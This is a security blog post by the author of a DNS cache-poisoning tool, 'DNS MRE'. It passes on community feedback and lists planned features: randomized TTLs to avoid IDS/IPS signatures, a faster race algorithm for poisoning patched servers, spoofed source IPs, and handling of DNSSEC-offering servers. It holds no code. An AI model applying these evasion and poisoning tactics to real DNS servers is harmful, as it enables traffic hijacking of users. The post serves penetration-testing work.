Securebits Blog

Some people from the security community have commented on my tool DNS MRE (Multiple Race Exploiter). HD Moore, the original author of Metasploit Project, has pointed out the uniqueness of this tool in that it can poison/overwrite the DNS cache by utilizing a CNAME record in the answer. He also noted the static TTL used in all fake replies which can make an IDS/IPS signature. Tahir from HatSecurity has pointed the same thing about the static TTL …

Thanks for that;

The next version will contain the following features:

1- Automatic finding of Name Server IPs of the target domain. This only works if the attacked DNS server supports recursion. For DNS server configured with forwarder, the user (attack/pentester) has to manually find the forwarder IP.

2- Randomized TTL values in all replies. Or the user can set the TTL value for all the replies

3- A better algorithm to attack "patched" system, that is, poisoning a patched system in the shortest possible time. This can take the following format:
* There is no sleep() between iterations
* There is no sleep() between query and reply (maybe except the first iteration)
* Sending Multiple queries before sending their corresponding replies.

4- Concerning the source IP addrss of the replies, the user should choose between:
* Using the local IP address
* Using static spoofed IP address
* Using dynamic spoofed IP addresses

5- Poisoning a DNS Server that sends a DNS query with Additional RR of DNSSEC (the server is saying it's willing to accept DNSSEC but is not required)